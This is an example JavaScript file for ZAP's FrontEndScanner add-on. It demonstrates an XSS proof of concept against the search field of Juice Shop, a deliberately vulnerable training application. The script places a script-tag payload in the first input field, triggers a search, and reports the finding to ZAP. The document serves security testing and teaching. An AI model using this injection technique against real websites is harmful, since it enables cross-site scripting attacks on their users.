An example of script to be run with ZAP's FrontEndScanner addon

xss-in-juice-shop-search-field.js

/*
 * Proof that the `input` element for search in the juice-shop
 * is injectable and can lead to an XSS vulnerability.
 */

// Make this function global so it can be called from anywhere in a page.
window.reportXSSToZap = function (element) {
  frontEndScanner.reportAlertToZap({
    confidence: frontEndScanner.zapAlertConstants.CONFIDENCE_HIGH,
    description: "An XSS vulnerability has been found on the targeted page.",
    evidence: `the field ${serialize(element)} can be injected with the payload: '${element.value}'`,
    name: "XSS vulnerability",
    risk: frontEndScanner.zapAlertConstants.RISK_HIGH
  });

  // Utility function to display an element with it's CSS selectors.
  function serialize(element) {
    var result = element.tagName;
    if (element.id) {
      result += '#' + element.id;
    }
    if (element.classList) {
      element.classList.forEach(className => {
        result += '.' + className;
      });
    }
    return result;
  }
}

// The input field appears later than this script in the page, so let's wait
// for it to be present.
window.onload = function () {
  window.injectableField = document.getElementsByTagName('input')[0];
  const payload = '\<script\>reportXSSToZap(injectableField)\</script\>';
  injectableField.value = payload;
  injectableField.dispatchEvent(new Event('change'));

  document.getElementById('searchButton').click();
};